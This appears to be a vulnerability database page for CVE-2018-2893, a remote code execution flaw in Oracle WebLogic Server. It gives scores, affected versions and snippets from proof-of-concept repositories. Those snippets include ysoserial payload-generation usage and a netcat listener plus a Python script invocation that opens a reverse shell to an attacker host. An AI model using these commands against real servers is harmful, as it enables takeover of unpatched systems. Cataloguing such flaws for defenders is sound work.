Published: 18/07/2018 Updated: 03/10/2019

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 670

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerable Product	Search on Vulmon	Subscribe to Product
oracle weblogic server 12.2.1.2.0
oracle weblogic server 12.2.1.3
oracle weblogic server 12.1.3.0.0
oracle weblogic server 10.3.6.0.0

CVE-2018-2628 & CVE-2018-2893

CVE-2018-2628 简单解读：mpweixinqqcom/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483673&idx=1&sn=45360b4ed1c95947088121b28cb1e45e&chksm=fb4a21f1cc3da8e748b3ac6e37ac483b917857c2338b9c3f7d315c842157397e7435a7c02bb8#rd or xxlegendcom/2018/04/18/CVE-2018-2628%20%E7%AE%80%E5%8D%95%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%86%E6%9E%90/ this PoC ca

Personal CTF Toolkit 此工具包最初是基于精灵表哥和一个佚名表哥的工具包整理的，后来加上本人打ctf和渗透时所添加的一些工具，应当还算全面(傲娇脸)。 QAQ 表哥们自然都有自己的kit，不过，互通有无总是好的嘛，看看下面目录里哪些有需要大家自取就好了（￣︶￣）↗ 包比较大，Github又

Personal CTF Toolkit

Personal CTF Toolkit 此工具包最初是基于精灵表哥和一个佚名表哥的工具包整理的，后来加上本人打CTF和渗透时所添加的一些工具，应当还算全面。希望这份工具包可以为刚刚接触CTF的朋友构造自己的工具链带来一些微小的帮助。考虑Github国内访问问题，下载还是放在网盘：链接：sh

CVE-2018-2893-PoC

CVE-2018-2893 Step 1 java -jar ysoserial-cve-2018-2893jar WHY SO SERIAL? Usage: java -jar ysoserial-cve-2018-2893jar [payload] '[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ JRMPClient @mbechler JRMPClient2 @mbechler JRMPClient3 @mbechler JRMPClient4 @mbechler Jdk7u21

CVE-2018-2893

CVE-2018-2893 Weblogic CVE-2018-2893 Enjoy 测试环境-Docker The Docker In Here! githubcom/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/READMEmd Ps: 由于外网有RMI远程服务器，很方便弹到shell; 如果在内网，你需要指定自己的RMI服务器，不然无法获取到反弹Shell !!! 0x01 generate-payload 0x02 send-payload Payload: 00a4d1651ff

CVE-2018-3245

Weblogic-CVE-2018-3245 CVE-2018-3245 0x00 简介当地时间10月16日，北京时间10月17日凌晨，Oracle官方发布了10月份（第三季度）关键补丁更新CPU（Critical Patch Update）, 其中修复了一个7月份（第二季度）CPU补丁中未能完全修复的（CVE-2018-2893）Weblogic远程代码执行漏洞，此次新修复的漏洞编号为CVE-2018-324

CVE-2018-2893 PoC

CVE-2018-2893 Step 1 java -jar ysoserial-cve-2018-2893jar WHY SO SERIAL? Usage: java -jar ysoserial-[version]-alljar [payload] '[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ JRMPClient @mbechler JRMPClient2 @pynerd JRMPClient3 @pynerd JRMPClient4 @pynerd Jdk7u21 @froh

可以直接反弹shell

CVE-2018-2893 可以直接反弹shell Usage 监听 nc -lvvp reverse_port 发送payload python weblogicpy target_host target_port reverse_host reverse_port Reffer bigsizeme pyn3rd 说明仅用于测试和交流学习，勿作他用

CVE-2018-2893 PoC

NVD-CWE-noinfo http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html http://www.securitytracker.com/id/1041301 http://www.securityfocus.com/bid/104763 https://nvd.nist.gov https://github.com/shengqi158/CVE-2018-2628

Get Started

CVE-2018-2893

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect